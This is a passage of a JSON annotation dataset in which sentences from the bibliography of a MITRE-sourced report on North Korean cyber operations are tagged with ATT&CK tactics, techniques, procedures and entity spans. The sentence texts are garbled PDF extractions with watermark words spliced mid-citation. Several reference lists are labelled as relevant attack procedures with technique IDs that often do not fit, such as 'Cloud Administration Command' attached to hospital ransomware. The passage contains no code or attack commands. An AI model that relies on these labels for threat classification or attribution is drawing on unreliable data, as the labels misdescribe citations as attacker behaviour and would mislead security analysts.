"mitre-79_mitre_report-p52-s402-f94c23", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 52, "sentence_id": 402, "context_before": "https://linkedin.\ncom/posts/abhisheksinghsoni_blockchainsecurity-cryptoscamalert-defijobs-activity-7127542067001475073-71xU/\n0x50D4.", "sentence_text": "“Python Malware.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p52-s403-fb3409", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 52, "sentence_id": 403, "context_before": "“Python Malware.”", "sentence_text": "WORKFORCE IT Karlo Zanki, “Fake Recruiter Coding Tests Target Devs with Malicious Python Packages,” ReversingLabs, September2024, https://www.reversinglabs.com/blog/fake-recruiter-coding-tests-target-devs-with-malicious-python- HIDDEN packages AND Seulkee Jang, “Kim Jong Un Is Directly Handling Results of New COVID-19 Hacking Organization’s Work,” Daily NK, CYBER February 5, 2021, https://www.dailynk.com/english/kim-jong-un-directly-handling-results-new-covid-19-hacking- organization-work/ DPRK’S ClearSky Cyber Security, “Attributing CryptoCore Attacks Against Crypto Exchanges to Lazarus,” May 2021, https://", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p53-s404-895e3f", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 53, "sentence_id": 404, "context_before": "WORKFORCE IT Karlo Zanki, “Fake Recruiter Coding Tests Target Devs with Malicious Python Packages,” ReversingLabs, September2024, https://www.reversinglabs.com/blog/fake-recruiter-coding-tests-target-devs-with-malicious-python- HIDDEN packages AND Seulkee Jang, “Kim Jong Un Is Directly Handling Results of New COVID-19 Hacking Organization’s Work,” Daily NK, CYBER February 5, 2021, https://www.dailynk.com/english/kim-jong-un-directly-handling-results-new-covid-19-hacking- organization-work/ DPRK’S ClearSky Cyber Security, “Attributing CryptoCore Attacks Against Crypto Exchanges to Lazarus,” May 2021, https://", "sentence_text": "Josh Smith and Jack Stubbs, “Exclusive: North Korea-Linked Hackers Targeted AstraZeneca in COVID-19 Spying Campaign – Sources,” Reuters, November 27, 2020, https://www.reuters.com/article/us-healthcare-coronavirus- astrazeneca-no-idUSKBN2871A2/ Tom Burt, “Cyberattacks Targeting Health Care Must Stop,” Microsoft On the Issues, November 13, 2020, https:// blogs.microsoft.com/on-the-issues/2020/11/13/health-care-cyberattacks-covid-19-paris-peace-forum/ U.S. Department of Justice, “North Korean Regime-Backed Programmer Charged with Conspiracy to Conduct Multiple Cyberattacks and Intrusions,” September 6, 2018, https://www.justice.gov/usao-cdca/pr/north-korean- regime-backed-programmer-charged-conspiracy-conduct-multiple-cyberattacks U.S. Department of Justice, “Criminal Complaint: United States v. Park Jin Hyok,” September 6, 2018, https://www.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p53-s405-d7d0be", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 53, "sentence_id": 405, "context_before": "Josh Smith and Jack Stubbs, “Exclusive: North Korea-Linked Hackers Targeted AstraZeneca in COVID-19 Spying Campaign – Sources,” Reuters, November 27, 2020, https://www.reuters.com/article/us-healthcare-coronavirus- astrazeneca-no-idUSKBN2871A2/ Tom Burt, “Cyberattacks Targeting Health Care Must Stop,” Microsoft On the Issues, November 13, 2020, https:// blogs.microsoft.com/on-the-issues/2020/11/13/health-care-cyberattacks-covid-19-paris-peace-forum/ U.S. Department of Justice, “North Korean Regime-Backed Programmer Charged with Conspiracy to Conduct Multiple Cyberattacks and Intrusions,” September 6, 2018, https://www.justice.gov/usao-cdca/pr/north-korean- regime-backed-programmer-charged-conspiracy-conduct-multiple-cyberattacks U.S. Department of Justice, “Criminal Complaint: United States v. Park Jin Hyok,” September 6, 2018, https://www.", "sentence_text": "justice.gov/archives/opa/press-release/file/1367701/dl?inline=\n“Third Floor,” North Korea Leadership Watch, accessed April 15, 2025, https://nkleadershipwatch.wordpress.com/ kji-2/third-floor/ Kim Chong Woo, “The Evolution of North Korean Cyber Threats,” The Asan Institute for Policy Studies, February 20, 2019, https://en.asaninst.org/contents/the-evolution-of-north-korean-cyber-threats/ Analyst1, North Korea Intelligence Assessment 2022, October 2022, https://analyst1.com/north-korea-intelligence- assessment-2022/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p53-s406-3b4e50", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 53, "sentence_id": 406, "context_before": "justice.gov/archives/opa/press-release/file/1367701/dl?inline=\n“Third Floor,” North Korea Leadership Watch, accessed April 15, 2025, https://nkleadershipwatch.wordpress.com/ kji-2/third-floor/ Kim Chong Woo, “The Evolution of North Korean Cyber Threats,” The Asan Institute for Policy Studies, February 20, 2019, https://en.asaninst.org/contents/the-evolution-of-north-korean-cyber-threats/ Analyst1, North Korea Intelligence Assessment 2022, October 2022, https://analyst1.com/north-korea-intelligence- assessment-2022/", "sentence_text": "Kai Weiss, “Fighting for Freedom With Balloons: The Story of Lee Min-Bok,” Austrian Economics Center, April 12, 2021, https://austriancenter.com/fighting-freedom-balloons-lee-min-bok/ Cybersecurity and Infrastructure Security Agency, “North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector,” Alert (AA22-187A), July 6, 2022, https://www.cisa.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Targets healthcare sector with Maui ransomware", "entities": [ { "text": "North Korean State-Sponsored Cyber Actors ", "start": 235, "end": 277, "label": "ThreatActor" }, { "text": "Maui Ransomware", "start": 281, "end": 296, "label": "MalwareTool" }, { "text": "Healthcare and Public Health Sector", "start": 311, "end": 346, "label": "Infrastructure_Indicator" }, { "text": "Target ", "start": 300, "end": 307, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p53-s407-c8d6e6", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 53, "sentence_id": 407, "context_before": "Kai Weiss, “Fighting for Freedom With Balloons: The Story of Lee Min-Bok,” Austrian Economics Center, April 12, 2021, https://austriancenter.com/fighting-freedom-balloons-lee-min-bok/ Cybersecurity and Infrastructure Security Agency, “North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector,” Alert (AA22-187A), July 6, 2022, https://www.cisa.", "sentence_text": "gov/news-events/alerts/2022/07/06/north-korean-state-sponsored-cyber-actors-use-maui-ransomware-target\nJason Nelson, “FBI: North Korea’s Lazarus Group Behind $100M Harmony Bridge Hack,” Decrypt, February 14, 2023, 53 Ax Sharma, “Hackers Stole $620 Million from Axie Infinity via Fake Job Interviews,” BleepingComputer, March 30, 2022, https://www.bleepingcomputer.com/news/security/hackers-stole-620-million-from-axie-infinity-via-fake- job-interviews/ WORKFORCE IT Andy Greenberg, “North Korean Hackers Stole $3 Billion in Crypto—and They’re Just Getting Started,” Wired, June 3, 2022, https://www.wired.com/story/north-korea-hackers-apt38-cryptocurrency/ HIDDEN U.S. Department of the Treasury, “Treasury Continues to Counter North Korea’s Use of Cryptocurrency to Evade AND Sanctions,” April 14, 2022, https://home.treasury.gov/news/press-releases/sm924 Cybersecurity and Infrastructure Security Agency, “North Korean Remote Access Trojan: H0lyGh0st,” Advisory (AA21- SYNDICATE 048A), February 17, 2021, https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-048a CYBER Ravie Lakshmanan, “North Korean UNC2970 Hackers Expands Attacks to More Sectors with Phishing Campaigns,” The Hacker News, March 2023, https://thehackernews.com/2023/03/north-korean-unc2970-hackers-expands.html DPRK’S AhnLab Security Emergency Response Center (ASEC), Andariel:", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" }, { "id": "T1566", "name": "Phishing" } ], "procedure": "Stole cryptocurrency via fake job interviews and phishing campaigns", "entities": [ { "text": "Lazarus Group", "start": 137, "end": 150, "label": "ThreatActor" }, { "text": "North Korean UNC2970", "start": 1100, "end": 1120, "label": "ThreatActor" }, { "text": "Andariel", "start": 1349, "end": 1357, "label": "ThreatActor" }, { "text": "H0lyGh0st", "start": 943, "end": 952, "label": "MalwareTool" }, { "text": "Harmony Bridge", "start": 164, "end": 178, "label": "Infrastructure_Indicator" }, { "text": "Axie Infinity", "start": 261, "end": 274, "label": "Infrastructure_Indicator" }, { "text": "Stole ", "start": 504, "end": 510, "label": "Action" }, { "text": "Evade AND Sanctions", "start": 767, "end": 786, "label": "Action" }, { "text": "Phishing Campaigns", "start": 1166, "end": 1184, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p54-s408-39bae7", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 54, "sentence_id": 408, "context_before": "gov/news-events/alerts/2022/07/06/north-korean-state-sponsored-cyber-actors-use-maui-ransomware-target\nJason Nelson, “FBI: North Korea’s Lazarus Group Behind $100M Harmony Bridge Hack,” Decrypt, February 14, 2023, 53 Ax Sharma, “Hackers Stole $620 Million from Axie Infinity via Fake Job Interviews,” BleepingComputer, March 30, 2022, https://www.bleepingcomputer.com/news/security/hackers-stole-620-million-from-axie-infinity-via-fake- job-interviews/ WORKFORCE IT Andy Greenberg, “North Korean Hackers Stole $3 Billion in Crypto—and They’re Just Getting Started,” Wired, June 3, 2022, https://www.wired.com/story/north-korea-hackers-apt38-cryptocurrency/ HIDDEN U.S. Department of the Treasury, “Treasury Continues to Counter North Korea’s Use of Cryptocurrency to Evade AND Sanctions,” April 14, 2022, https://home.treasury.gov/news/press-releases/sm924 Cybersecurity and Infrastructure Security Agency, “North Korean Remote Access Trojan: H0lyGh0st,” Advisory (AA21- SYNDICATE 048A), February 17, 2021, https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-048a CYBER Ravie Lakshmanan, “North Korean UNC2970 Hackers Expands Attacks to More Sectors with Phishing Campaigns,” The Hacker News, March 2023, https://thehackernews.com/2023/03/north-korean-unc2970-hackers-expands.html DPRK’S AhnLab Security Emergency Response Center (ASEC), Andariel:", "sentence_text": "Cybersecurity and Infrastructure Security Agency, “North Korean State-Sponsored APT Targets Blockchain Companies,” Advisory (AA22-108A), April 18, 2022, https://www.cisa.gov/news-events/cybersecurity-advisories/ aa22-108a Google Cloud Threat Intelligence, “North Korea Targets Security Researchers with Supply Chain Attacks,” Google Cloud Blog, January 25, 2024, https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain Google Cloud Threat Intelligence, “3CX Software Supply Chain Compromise: What Happened and What You Need to Know,” Google Cloud Blog, March 30, 2023, https://cloud.google.com/blog/topics/threat-intelligence/3cx-software- supply-chain-compromise AhnLab Security Emergency Response Center (ASEC), “APT37 Group’s Active Exploitation of Abandoned Korean Web Server,” February 20, 2024, https://asec.ahnlab.com/ko/49180/ Zscaler ThreatLabz, “An Unintentional Leak: A Glimpse into the Attack Vectors of APT37,” Zscaler Blog, August 23, 2023, https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37 Cybersecurity and Infrastructure Security Agency, National Security Agency, and FBI, “Ransomware Attacks on Critical Infrastructure Fund DPRK Activities,” February 9, 2023, https://media.defense.gov/2023/ Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF Google Cloud Threat Intelligence, “APT43: North Korean Cybercrime and Espionage,” Google Cloud Blog, April 4, 2023, https://cloud.google.com/blog/topics/threat-intelligence/apt43-north-korea-cybercrime-espionage Google Cloud Threat Intelligence, “APT38: Details on New North Korean Regime-Backed Threat Group,” Google Cloud Blog, July 25, 2023, https://cloud.google.com/blog/topics/threat-intelligence/apt38-details-on-new-north-korean- regime-backed-threat-group Google Cloud Threat Intelligence, “APT37: An Overlooked North Korean Actor,” Google Cloud Blog, September 28, 2023, https://cloud.google.com/blog/topics/threat-intelligence/apt37-overlooked-north-korean-actor Google Cloud Threat Intelligence, “Mapping North Korea’s Cyber Threat Structure and Alignment,” Google Cloud Blog, November 1, 2023, https://cloud.google.com/blog/topics/threat-intelligence/north-korea-cyber-structure- alignment-2023 Jenny Town, “Inside a North Korean Internet Server: How Well Do You Know Your Partners?”", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" }, { "id": "T1486", "name": "Data Encrypted for Impact" }, { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Targets blockchain companies, exploits abandoned servers, conducts ransomware attacks on critical infrastructure, and compromises software supply chains", "entities": [ { "text": "North Korean State-Sponsored APT", "start": 51, "end": 83, "label": "ThreatActor" }, { "text": "APT37 ", "start": 741, "end": 747, "label": "ThreatActor" }, { "text": "APT37", "start": 942, "end": 947, "label": "ThreatActor" }, { "text": "APT37", "start": 1861, "end": 1866, "label": "ThreatActor" }, { "text": "APT43", "start": 1397, "end": 1402, "label": "ThreatActor" }, { "text": "APT38", "start": 1609, "end": 1614, "label": "ThreatActor" }, { "text": "DPRK ", "start": 1214, "end": 1219, "label": "ThreatActor" }, { "text": "Blockchain Companies", "start": 92, "end": 112, "label": "Infrastructure_Indicator" }, { "text": "Abandoned Korean Web Server", "start": 778, "end": 805, "label": "Infrastructure_Indicator" }, { "text": " Critical Infrastructure", "start": 1184, "end": 1208, "label": "Infrastructure_Indicator" }, { "text": "3CX Software Supply Chain", "start": 480, "end": 505, "label": "Infrastructure_Indicator" }, { "text": "Targets ", "start": 84, "end": 92, "label": "Action" }, { "text": "Targets ", "start": 269, "end": 277, "label": "Action" }, { "text": "Exploitation ", "start": 762, "end": 775, "label": "Action" }, { "text": "Ransomware Attacks", "start": 1163, "end": 1181, "label": "Action" }, { "text": "Supply Chain Compromise", "start": 493, "end": 516, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p54-s409-fe5ac6", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 54, "sentence_id": 409, "context_before": "Cybersecurity and Infrastructure Security Agency, “North Korean State-Sponsored APT Targets Blockchain Companies,” Advisory (AA22-108A), April 18, 2022, https://www.cisa.gov/news-events/cybersecurity-advisories/ aa22-108a Google Cloud Threat Intelligence, “North Korea Targets Security Researchers with Supply Chain Attacks,” Google Cloud Blog, January 25, 2024, https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain Google Cloud Threat Intelligence, “3CX Software Supply Chain Compromise: What Happened and What You Need to Know,” Google Cloud Blog, March 30, 2023, https://cloud.google.com/blog/topics/threat-intelligence/3cx-software- supply-chain-compromise AhnLab Security Emergency Response Center (ASEC), “APT37 Group’s Active Exploitation of Abandoned Korean Web Server,” February 20, 2024, https://asec.ahnlab.com/ko/49180/ Zscaler ThreatLabz, “An Unintentional Leak: A Glimpse into the Attack Vectors of APT37,” Zscaler Blog, August 23, 2023, https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37 Cybersecurity and Infrastructure Security Agency, National Security Agency, and FBI, “Ransomware Attacks on Critical Infrastructure Fund DPRK Activities,” February 9, 2023, https://media.defense.gov/2023/ Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF Google Cloud Threat Intelligence, “APT43: North Korean Cybercrime and Espionage,” Google Cloud Blog, April 4, 2023, https://cloud.google.com/blog/topics/threat-intelligence/apt43-north-korea-cybercrime-espionage Google Cloud Threat Intelligence, “APT38: Details on New North Korean Regime-Backed Threat Group,” Google Cloud Blog, July 25, 2023, https://cloud.google.com/blog/topics/threat-intelligence/apt38-details-on-new-north-korean- regime-backed-threat-group Google Cloud Threat Intelligence, “APT37: An Overlooked North Korean Actor,” Google Cloud Blog, September 28, 2023, https://cloud.google.com/blog/topics/threat-intelligence/apt37-overlooked-north-korean-actor Google Cloud Threat Intelligence, “Mapping North Korea’s Cyber Threat Structure and Alignment,” Google Cloud Blog, November 1, 2023, https://cloud.google.com/blog/topics/threat-intelligence/north-korea-cyber-structure- alignment-2023 Jenny Town, “Inside a North Korean Internet Server: How Well Do You Know Your Partners?”", "sentence_text": "Stimson Center, January WORKFORCE 17, 2024, https://www.stimson.org/2024/inside-a-north-korean-internet-server-how-well-do-you-know-your- IT partners/ HIDDEN Katie Bo Lillis, “US Animation Studio Uncovers Sketches on a North Korean Server,” CNN, April 22, 2024, https:// ANDwww.cnn.com/2024/04/22/politics/us-animation-studio-sketches-korean-server/index.html Federal Bureau of Investigation, “Rim Jong Hyok,” FBI Cyber’s Most Wanted, accessed April 15, 2025, https://www.fbi.gov/wanted/cyber/rim-jong-hyok SYNDICATE U.S. Department of Justice, “North Korean Government Hacker Charged in Involvement in Ransomware Attacks CYBER Targeting U.S. Hospitals,” July 19, 2021, https://www.justice.gov/archives/opa/pr/north-korean-government- hacker-charged-involvement-ransomware-attacks-targeting-us-hospitals DPRK’S Alexandra Kelley, “FBI, Mandiant Designate Advanced North Korean Hackers Stealing US Defense Secrets,” Nextgov, July 3, 2024, https://www.nextgov.com/cybersecurity/2024/07/fbi-mandiant-designate-advanced-north-korean- EXPOSING", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" }, { "id": "T1651", "name": "Cloud Administration Command" } ], "procedure": "Conducts ransomware attacks on US hospitals and steals US defense secrets", "entities": [ { "text": "North Korean Government Hacker", "start": 546, "end": 576, "label": "ThreatActor" }, { "text": "Rim Jong Hyok", "start": 394, "end": 407, "label": "ThreatActor" }, { "text": " Advanced North Korean Hackers", "start": 853, "end": 883, "label": "ThreatActor" }, { "text": " US Defense Secrets", "start": 892, "end": 911, "label": "Infrastructure_Indicator" }, { "text": " U.S. Hospitals", "start": 637, "end": 652, "label": "Infrastructure_Indicator" }, { "text": "Ransomware Attacks", "start": 603, "end": 621, "label": "Action" }, { "text": "Stealing ", "start": 884, "end": 893, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p55-s410-eed355", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 55, "sentence_id": 410, "context_before": "Stimson Center, January WORKFORCE 17, 2024, https://www.stimson.org/2024/inside-a-north-korean-internet-server-how-well-do-you-know-your- IT partners/ HIDDEN Katie Bo Lillis, “US Animation Studio Uncovers Sketches on a North Korean Server,” CNN, April 22, 2024, https:// ANDwww.cnn.com/2024/04/22/politics/us-animation-studio-sketches-korean-server/index.html Federal Bureau of Investigation, “Rim Jong Hyok,” FBI Cyber’s Most Wanted, accessed April 15, 2025, https://www.fbi.gov/wanted/cyber/rim-jong-hyok SYNDICATE U.S. Department of Justice, “North Korean Government Hacker Charged in Involvement in Ransomware Attacks CYBER Targeting U.S. Hospitals,” July 19, 2021, https://www.justice.gov/archives/opa/pr/north-korean-government- hacker-charged-involvement-ransomware-attacks-targeting-us-hospitals DPRK’S Alexandra Kelley, “FBI, Mandiant Designate Advanced North Korean Hackers Stealing US Defense Secrets,” Nextgov, July 3, 2024, https://www.nextgov.com/cybersecurity/2024/07/fbi-mandiant-designate-advanced-north-korean- EXPOSING", "sentence_text": "hackers-stealing-us-defense-secrets/398308/\nAndy Greenberg, “A Max Cartoon Studio Unwittingly Exposed a North Korean Server,” Wired, April 22, 2024, https:// Internet Crime Complaint Center (IC3), “Public Service Announcement PSA250226: North Korean IT Workers Continue Malicious Activity,” February 26, 2025, https://www.ic3.gov/psa/2025/psa250226 Peter W. Singer, “Here’s What We Actually Know", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p55-s411-90259d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 55, "sentence_id": 411, "context_before": "hackers-stealing-us-defense-secrets/398308/\nAndy Greenberg, “A Max Cartoon Studio Unwittingly Exposed a North Korean Server,” Wired, April 22, 2024, https:// Internet Crime Complaint Center (IC3), “Public Service Announcement PSA250226: North Korean IT Workers Continue Malicious Activity,” February 26, 2025, https://www.ic3.gov/psa/2025/psa250226 Peter W. Singer, “Here’s What We Actually Know", "sentence_text": "About North Korea’s Cyber Program,” Foreign Policy, March 21, 2013, Michelle Delio, “North Korea’s School for Hackers,” Wired, June 9, 2003, https://www.wired.com/2003/06/north- koreas-school-for-hackers/ David Martin, “Experts: North Korea Training Teams of Cyber Warriors,” CBS News, June 18, 2009, https://www.\ncbsnews.com/news/experts-north-korea-training-teams-of-cyber-warriors/\nUniversity of Washington Jackson School of International Studies, “North Korea Cyber Attacks: A New Asymmetrical Military Strategy?”", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Trains cyber warriors and conducts cyber attacks as asymmetrical military strategy", "entities": [ { "text": "North Korea", "start": 6, "end": 17, "label": "ThreatActor" }, { "text": "Training ", "start": 241, "end": 250, "label": "Action" }, { "text": "Cyber Attacks", "start": 464, "end": 477, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p55-s412-4cbf96", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 55, "sentence_id": 412, "context_before": "About North Korea’s Cyber Program,” Foreign Policy, March 21, 2013, Michelle Delio, “North Korea’s School for Hackers,” Wired, June 9, 2003, https://www.wired.com/2003/06/north- koreas-school-for-hackers/ David Martin, “Experts: North Korea Training Teams of Cyber Warriors,” CBS News, June 18, 2009, https://www.\ncbsnews.com/news/experts-north-korea-training-teams-of-cyber-warriors/\nUniversity of Washington Jackson School of International Studies, “North Korea Cyber Attacks: A New Asymmetrical Military Strategy?”", "sentence_text": "May 3, 2022, https://jsis.washington.edu/news/north-korea-cyber-attacks-new-asymmetrical- military-strategy/ Pinkston, Daniel A. “Inter-Korean Rivalry in the Cyber Domain: The North Korean Cyber Threat in the ‘Sŏn’gun’ Era.”", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Poses cyber threat as inter-Korean rivalry in cyber domain", "entities": [ { "text": "North Korean", "start": 176, "end": 188, "label": "ThreatActor" }, { "text": "Cyber Threat", "start": 189, "end": 201, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p55-s413-8532be", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 55, "sentence_id": 413, "context_before": "May 3, 2022, https://jsis.washington.edu/news/north-korea-cyber-attacks-new-asymmetrical- military-strategy/ Pinkston, Daniel A. “Inter-Korean Rivalry in the Cyber Domain: The North Korean Cyber Threat in the ‘Sŏn’gun’ Era.”", "sentence_text": "Ina Fried, “North Korea Hacked Social Media Accounts Including Twitter and Google,” Axios, January 27, 2021, Erin Banco, “U.S. Firms Including Hired North Korean IT Workers Posing as Americans, FBI Claims,” The Daily Beast, WORKFORCE May 17, 2022, https://www.thedailybeast.com/us-firms-including-hired-north-korean-it-workers-posing-as- IT americans-fbi-claims/ HIDDEN crowdfunding-scheme U.S. Department of the Treasury, “Treasury Sanctions North Korean Individuals Supporting the Regime’s Malicious SYNDICATE Cyber Activities,” March 2, 2020, https://home.treasury.gov/news/press-releases/sm481 CYBER OpenSanctions, “Entity Profile: North Korea, Reconnaissance General Bureau,” accessed April 15, 2025, https:// U.S. Department of Justice, “Fourteen North Korean Nationals Indicted for Carrying Out Multi-Year Fraudulent IT Worker Scheme,” October 19, 2023, https://www.justice.gov/archives/opa/pr/fourteen-north-korean-nationals-indicted-carrying-out-multi-year-fraudulent-information EXPOSING", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1585", "name": "Establish Accounts" }, { "id": "T1036", "name": "Masquerading" } ], "procedure": "Hacked social media accounts, posed as Americans in fraudulent IT worker schemes", "entities": [ { "text": "North Korean", "start": 149, "end": 161, "label": "ThreatActor" }, { "text": "Reconnaissance General Bureau", "start": 649, "end": 678, "label": "ThreatActor" }, { "text": "North Korean Nationals", "start": 753, "end": 775, "label": "ThreatActor" }, { "text": "Social Media Accounts", "start": 31, "end": 52, "label": "Infrastructure_Indicator" }, { "text": "Twitter ", "start": 63, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "Google", "start": 75, "end": 81, "label": "Infrastructure_Indicator" }, { "text": "U.S. Firms", "start": 122, "end": 132, "label": "Infrastructure_Indicator" }, { "text": "Hacked ", "start": 24, "end": 31, "label": "Action" }, { "text": "Posing as Americans", "start": 173, "end": 192, "label": "Action" }, { "text": " Fraudulent IT Worker Scheme", "start": 812, "end": 840, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p56-s414-775fdf", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 56, "sentence_id": 414, "context_before": "Ina Fried, “North Korea Hacked Social Media Accounts Including Twitter and Google,” Axios, January 27, 2021, Erin Banco, “U.S. Firms Including Hired North Korean IT Workers Posing as Americans, FBI Claims,” The Daily Beast, WORKFORCE May 17, 2022, https://www.thedailybeast.com/us-firms-including-hired-north-korean-it-workers-posing-as- IT americans-fbi-claims/ HIDDEN crowdfunding-scheme U.S. Department of the Treasury, “Treasury Sanctions North Korean Individuals Supporting the Regime’s Malicious SYNDICATE Cyber Activities,” March 2, 2020, https://home.treasury.gov/news/press-releases/sm481 CYBER OpenSanctions, “Entity Profile: North Korea, Reconnaissance General Bureau,” accessed April 15, 2025, https:// U.S. Department of Justice, “Fourteen North Korean Nationals Indicted for Carrying Out Multi-Year Fraudulent IT Worker Scheme,” October 19, 2023, https://www.justice.gov/archives/opa/pr/fourteen-north-korean-nationals-indicted-carrying-out-multi-year-fraudulent-information EXPOSING", "sentence_text": "U.S. Department of the Treasury, Office of Foreign Assets Control, “Entity List: Volasys Silver Star,” accessed April 15, 2025, https://sanctionssearch.ofac.treas.gov/Details.aspx?id=24977 U.S. Department of State, Rewards for Justice – Yanbian Silverstar and Volasys Silverstar, accessed April 15, 2025, DPRK Cyber Threat Intelligence Project, “Volasys Silver Star,” accessed April 15, 2025, https://dprk-reports.org/ entities/6e90657ef72588ed1d79af94be13901da1135b90.aae6d5f504d62e2c8d5a8089caf9de1f03d703a2 United Nations Security Council, “Letter Dated 31 August 2023 from the Panel of Experts Established Pursuant to Resolution 1874 (2009)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p56-s415-c30c34", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 56, "sentence_id": 415, "context_before": "U.S. Department of the Treasury, Office of Foreign Assets Control, “Entity List: Volasys Silver Star,” accessed April 15, 2025, https://sanctionssearch.ofac.treas.gov/Details.aspx?id=24977 U.S. Department of State, Rewards for Justice – Yanbian Silverstar and Volasys Silverstar, accessed April 15, 2025, DPRK Cyber Threat Intelligence Project, “Volasys Silver Star,” accessed April 15, 2025, https://dprk-reports.org/ entities/6e90657ef72588ed1d79af94be13901da1135b90.aae6d5f504d62e2c8d5a8089caf9de1f03d703a2 United Nations Security Council, “Letter Dated 31 August 2023 from the Panel of Experts Established Pursuant to Resolution 1874 (2009)", "sentence_text": "Addressed to the President of the Security Council,” S/2023/668, https://documents.un.org/ doc/undoc/gen/n23/238/69/pdf/n2323869.pdf Jesse Coghlan, “ZachXBT Claims 21 North Korea Crypto Devs Making $500K a Month,” Cointelegraph, July 25, 2023, Staffing Industry Analysts, “US Departments Warn on North Korean IT Workers, Hold Symposium for IT Staffing Firms,” August 1, 2023, https://www.staffingindustry.com/news/global-daily-news/us-departments-warn-north- korean-it-workers-hold-symposium-it-staffing-firms U.S. Department of the Treasury, “U.S. Sanctions Hundreds of Targets in Response to Russia’s Illegal Annexation of Ukrainian Regions,” September 30, 2022, https://home.treasury.gov/news/press-releases/jy2215 U.S. Department of the Treasury, “Treasury Targets North Korean Weapons Representatives in Russia,” March 1, 2023, https://home.treasury.gov/news/press-releases/jy1498 Chainalysis, “OFAC’s Sanctions on North Korea and What They Mean for the Crypto Industry,” May 26, 2023, https:// CNBC, “North Korean Leader’s Half-Brother Killed in Malaysia: South Korean Media,” February 14, 2017, https://www.\ncnbc.com/2017/02/14/north-korean-leaders-half-brother-killed-in-malaysia-south-korea-media.html 56\nAdam Entous, “North Korea’s Abduction Project,” The New Yorker, February 8, 2024, https://www.newyorker.com/ news/news-desk/north-koreas-abduction-project Jesse Coghlan, “Lazarus Group’s 2024 Pause Was Repositioning for $1.4B Bybit Hack,” Cointelegraph via WORKFORCE TradingView, March 4, 2025, https://www.tradingview.com/news/cointelegraph:7211acb81094b:0-lazarus-group-s- IT 2024-pause-was-repositioning-for-1-4b-bybit-hack/ HIDDEN Leo Schwartz, “North Korea’s Bybit Hack Shows How Hard It Is to Keep Ethereum Safe,” Fortune Crypto, March 4, 2025, https://fortune.com/crypto/2025/03/04/north-korea-bybit-hack-ethereum-safe-dprk-lazarus-group- AND tradertraitor/ Chainalysis, “Crypto Hacking Trends: How North Korea Stole Billions in 2025,” Chainalysis Blog, March 2025, https:// SYNDICATE Commonplace Facts, “Internet in North Korea,” September 26, 2024,", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "North Korean crypto developers generating revenue and Lazarus Group hacking cryptocurrency exchanges", "entities": [ { "text": " North Korea", "start": 166, "end": 178, "label": "ThreatActor" }, { "text": "North Korea", "start": 920, "end": 931, "label": "ThreatActor" }, { "text": "North Korea", "start": 1920, "end": 1931, "label": "ThreatActor" }, { "text": "Lazarus Group", "start": 1385, "end": 1398, "label": "ThreatActor" }, { "text": "Bybit ", "start": 